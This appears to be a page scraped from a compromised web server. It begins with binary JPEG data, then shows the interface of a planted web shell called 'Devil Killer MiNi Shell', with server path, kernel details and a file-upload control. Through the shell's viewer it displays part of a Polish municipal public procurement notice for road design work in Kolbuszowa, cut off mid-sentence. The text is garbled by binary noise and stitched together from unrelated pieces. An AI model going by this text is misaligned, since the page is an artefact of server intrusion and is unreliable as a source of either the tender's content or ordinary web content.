JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220209/0005182001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Rozbudowa ulicy Topolowej – dokumentacja </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOLBUSZOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581666</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Obrońców Pokoju 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ekolbuszowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa ulicy Topolowej – dokumentacja </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0ffc26e0-898d-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00051820</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00018988/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Przebudowa ulicy Topolowej - dokumentacja</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ekolbuszowa.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu platformyzakupowejPZP24https://ekolbuszowa.logintrade.net<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie i Instrukcji dostępnych pod adresem<br/>https://ekolbuszowa.logintrade.net<br/>3. Szczegółowe informacje zawarto w rozdziale VIII Instrukcji dla Wykonawców (Rozdział I SWZ).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO do zastosowania przez zamawiających w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/><br/>1.1.	Zamawiający Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.1.1.	Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim <br/>w Kolbuszowej jest: Burmistrz Kolbuszowej; ul. Obrońców Pokoju 21, 36-100 Kolbuszowa. <br/>1.1.2.	Inspektorem ochrony danych osobowych w Gminie Kolbuszowa jest Pani: Lucyna Wyka<br/>ul. Piekarska 15<br/>36-100 Kolbuszowa <br/>Tel. 17 2271 333 wew. 424<br/>e-mail: rodo@ekolbuszowa.pl<br/><br/>1.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego:<br/>Rozbudowa ulicy Topolowej – dokumentacja.<br/>numer referencyjny nadany sprawie: ZP.271.1.6.2022<br/>prowadzonym w trybie: podstawowym bez przeprowadzania negocjacji<br/>1.1.4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 3 Ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (t.j. Dz. U. poz. 2019)., dalej „ustawa Pzp”; <br/>1.1.5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>1.1.6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>1.1.7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>1.1.8.	Posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>1.1.9.	Nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>1.2.	Wykonawca zobowiązany jest wypełnić obowiązek informacyjny przewidziany w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu, a także <br/>w trakcie realizacji umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Opracowanie dokumentacji projektowej na: „Rozbudowę ulicy Topolowej – dokumentacja” –<br/>zgodnie z załączoną koncepcją projektową oraz warunkami technicznymi do projektowanej<br/>rozbudowy drogi:<br/>1) Planowana rozbudowa realizowana będzie na odcinku o dł. ok. 790,0 mb<br/>(od skrzyżowania z ul. Św. Brata Alberta do skrzyżowania z ul. Błonie).<br/>2) Klasa drogi – L.<br/>3) Kategoria ruchu KR2.<br/>4) Przekrój typowy – uliczny w krawężniku.<br/>5) Droga: jednojezdniowa, dwukierunkowa.<br/>6) Nawierzchnię jezdni z betonu asfaltowego. Szerokość jezdni 6,0m.. Przebudowa jezdni na<br/>istniejącym odcinku drogi w km 0+000-0+455. Wykonanie nowej nawierzchni jezdni na odcinku<br/>drogi w km 0+455-0+789,77.<br/>7) Zaprojektować chodnik jednostronny na całej długości rozbudowywanej drogi.<br/>8) Przebudowa istniejących zjazdów w pasie drogi gminnej.<br/>9) Odwodnienie drogi poprzez spadek podłużny oraz poprzeczne poprzez projektowane wpusty<br/>uliczne do projektowanej kanalizacji deszczowej.<br/>10) Pokrywy studni infrastruktury technicznej znajdującej się w pasie drogowym wyregulować do<br/>projektowanych nawierzchni.<br/>11) Zabezpieczenie infrastruktury podziemnej na warunkach wydanych przez właścicieli lub<br/>zarządców sieci.<br/>12) Zaprojektować kanał technologiczny.<br/>13) Oświetlenie uliczne projektowane zgodne z istniejącym standardem sterowania w Gminie<br/>Kolbuszowa.<br/>14) Pozostałe warunki wg. Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2<br/>marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i<br/>ich usytuowanie (tj. Dz. U. 2016r., Poz. 124) oraz odpowiednich przepisów technicznobudowalnych.<br/>2. Wymagania ilości opracowań dla ww. zadań:<br/>1) Opracowanie mapę do celów projektowych - 1 egz.<br/>2) Opracowanie dokumentacji geotechnicznej w zakresie niezbędnym do realizacji przedmiotu<br/>zamówienia - 2 egz.<br/>3) Wniosek o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej winien zawierać w<br/>szczególności:<br/>a) przygotowanie wniosku wraz z uzyskaniem decyzji o zgodzie na realizację inwestycji<br/>drogowej ZRiD wraz z rygorem natychmiastowej wykonalności,<br/>b) mapę w skali co najmniej 1:5000 przedstawiającą proponowany przebieg drogi, z<br/>zaznaczeniem terenu niezbędnego dla obiektów budowlanych, oraz istniejące uzbrojenie terenu;<br/>c) analizę powiązania drogi z innymi drogami publicznymi,<br/>d) mapy zawierające projekty podziału nieruchomości wraz z pełną dokumentacją, sporządzone<br/>zgodnie z odrębnymi przepisami – co najmniej 6 egz.<br/>e) szczegółowe zestawienie nieruchomości objętych podziałami, - 6 egz.<br/>f) określenie nieruchomości lub ich części, z których korzystanie będzie ograniczone, - 6 egz.<br/>g) określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu – 6egz.<br/>h) uzyskanie w imieniu Zamawiającego warunków technicznych, opinii, uzgodnień, decyzji<br/>administracyjnych zgodnie z wymogami prawa i procedurami organów oraz gestorów sieci,<br/>i) opinie:<br/>a. ministra właściwego do spraw zdrowia - w odniesieniu do inwestycji lokalizowanych w<br/>miejscowościach uzdrowiskowych, zgodnie z odrębnymi przepisami,<br/>b. dyrektora właściwego urzędu morskiego - w odniesieniu do obszarów pasa technicznego,<br/>pasa ochronnego, morskich portów i przystani,<br/>c. właściwego organu nadzoru górniczego - w odniesieniu do terenów górniczych,<br/>d. dyrektora regionalnego zarządu gospodarki wodnej Państwowego Gospodarstwa Wodnego<br/>Wody Polskie - w odniesieniu do inwestycji obejmujących wykonanie urządzeń wodnych oraz w<br/>odniesieniu do wykonywania obiektów budowlanych lub robót na obszarach szczególnego<br/>zagrożenia powodzią,<br/>e. dyrektora właściwej regionalnej dyrekcji Lasów Państwowych - w odniesieniu do gruntów<br/>leśnych stanowiących własność Skarbu Państwa, będących w zarządzie Lasów Państwowych,<br/>f. właściwego wojewódzkiego konserwatora zabytków - w odniesieniu do dóbr kultury<br/>chronionych na podstawie odrębnych przepisów,<br/>g. właściwego zarządcy infrastruktury kolejowej - w odniesieniu do linii kolejowej,<br/>h. ga) podmiotu zarządzającego w rozumieniu ustawy z dnia 20 grudnia 1996 r. o portach i<br/>przystaniach morskich (Dz. U. z 2020 r. poz. 998 i 1086) - w odniesieniu do obszaru portu lub<br/>przystani morskiej,<br/>i. innych organów wymaganych przepisami szczególnymi;<br/>j) ostateczną decyzję o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia<br/>(jeśli będzie wymagana) – 1 egz.<br/>k) ostateczną decyzję o pozwoleniu wodnoprawnym (jeśli będzie wymagana) – 1 egz.<br/>l) wykonanie opisu stanu nieruchomości do celów odszkodowawczych na dzień wydania decyzji<br/>ZRiD.<br/>4) Kartę informacyjną przedsięwzięcia wraz z uzyskaniem decyzji o środowiskowych<br/>uwarunkowaniach (jeżeli będzie wymagana) - 3 egz.<br/>5) Operat wodno-prawny wraz z uzyskaniem pozwolenia wodnoprawnego (jeżeli będzie<br/>wymagany) – 3 egz.<br/>6) Projekt zagospodarowania działki lub terenu oraz projekt architektoniczno-budowlanego wraz<br/>z zaświadczeniem, o którym mowa w art. 12 ust. 7 ustawy z dnia 7 lipca 1994 r. - Prawo<br/>budowlane (Dz. U. z 2019 r. poz. 1186, z późn. zm.), aktualnym na dzień opracowania projektu<br/>wraz z uzyskaniem prawomocnego pozwolenia na budowę lub materiały do zgłoszenia wraz z<br/>uzyskaniem rozpoczęcia robót budowlanych - 3 egz.<br/>7) Projekt wykonawczy - 3 egz.<br/>8) Projekt stałej organizacji ruchu zatwierdzony przez właściwy organ zarządzający ruchem<br/>(wraz z uzyskaniem opinii oraz zatwierdzeniem projektu) - 3 egz.<br/>9) Kosztorys inwestorski wraz z przedmiarem - 1 egz.<br/>10) Szczegółowe specyfikacje techniczne (w wersji elektronicznej) - 1 egz.<br/>11) Wersja elektroniczna dokumentacji projektowej (.dwg oraz pliki .pdf) - 1 egz.<br/>12) Wykonanie pozostałych niezbędnych opracowań – min. 1 egz. z przeznaczeniem dla<br/>Zamawiającego + niezbędna ilość egzemplarzy do przeprowadzenia wymaganych prawem<br/>procedur.<br/>3. Zakres prac projektowych<br/>Prace projektowe powinny obejmować wszystkie czynności i koszty z nimi związane łącznie z<br/>opłatami pobieranymi przez urzędy i instytucje z tytułu uzgodnień prac projektowych oraz opłat<br/>związanych z uzyskaniem warunków technicznych dotyczących budowy, przebudowy<br/>istniejących mediów. Wykonawca powinien uwzględnić wymagania określone w warunkach<br/>technicznych wydanych przez właścicieli urządzeń infrastruktury i zarządców dróg oraz opiniach<br/>i uzgodnieniach. Wykonawca zobowiązany jest również opracować dokumentację usunięcia<br/>ewentualnych kolizji z istniejącą infrastrukturą. Prace projektowe winny obejmować również<br/>uzyskanie prawomocnego pozwolenia na budowę lub zgłoszenia rozpoczęcia robót budowlanych.<br/>W załączeniu koncepcja projektowa wraz z warunkami technicznymi (Rozdział III SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">300 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje udzielenie zamówień do 50%, o których mowa w art. 214 ust.<br/>1 pkt 7) udzielenia, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu<br/>wykonawcy usług lub robót budowlanych, zamówienia polegającego na powtórzeniu podobnych usług<br/>lub robót budowlanych, jeżeli takie zamówienie było przewidziane w ogłoszeniu o zamówieniu dla<br/>zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia<br/>została uwzględniona przy obliczaniu jego wartości.<br/>2. Warunki, na jakich zostanie udzielone zamówienie:<br/>1) W prowadzonym postępowaniu na podstawie art. 214 ust 1 pkt 7) Zamawiający będzie wprowadzał<br/>podstawy wykluczenia z postępowania identyczne z tymi, które stosował<br/>w pierwotnym przetargu łącznie z takimi samymi dokumentami na potwierdzenie ich spełnienia, tzn.<br/>wymienione w rozdziale 15, 19<br/>2) Obowiązywać będą te same zasady dotyczące podwykonawstwa.<br/>3) Terminy płatności i zasady rozliczeń nie będą modyfikowane w stosunku i proporcji do pierwotnego zamówienia i umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria wyboru ofert określono w Instrukcji dla Wykonawców (Rozdział I<br/>SWZ)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu o udzielenie zamówienia zamawiający może żądać podmiotowych środków<br/>dowodowych na potwierdzenie:<br/>1) Braku podstaw wykluczenia<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>Wykonawca składa aktualne na dzień składania ofert oświadczenie o braku podstaw do<br/>wykluczenia – zał. nr 1a do Rozdział I SWZ. Informacje zawarte w oświadczeniu będą stanowić<br/>potwierdzenie, że wykonawca nie podlega wykluczeniu.<br/>2) Spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>Wykonawca składa aktualne na dzień składania ofert oświadczenie o spełnianiu warunków<br/>udziału w postępowaniu – zał. nr 1b do Rozdział I SWZ. Informacje zawarte w oświadczeniu<br/>będą stanowić wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu.<br/>3) Warunek zdolności do występowania w obrocie gospodarczym – wpis do odpowiedniego<br/>rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowym zakresie.<br/>4) Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej – zezwolenia, licencje, koncesje lub wpis do rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowy zakresie.<br/>5) Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub<br/>finansowej, jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie<br/>mniejsza niż: 30.000,00 PLN.<br/>6) Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia,<br/>potencjału technicznego:<br/>a. Wykonawca spełnia ten warunek udziału w postępowaniu /dotyczący kwalifikacji<br/>zawodowych/, jeżeli wykaże, że dysponuje następującą osobą:<br/>a. Osoba posiadająca uprawnienia do projektowania bez ograniczeń w specjalności: - 1 osoba –<br/>inżynieryjnej drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały<br/>wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo<br/>budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy<br/>mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane<br/>na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy<br/>ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220).<br/>b. Wykonawca spełni ten warunek udziału w postępowaniu /dotyczący doświadczenia/ jeżeli<br/>wykaże, że: wykonał w ciągu 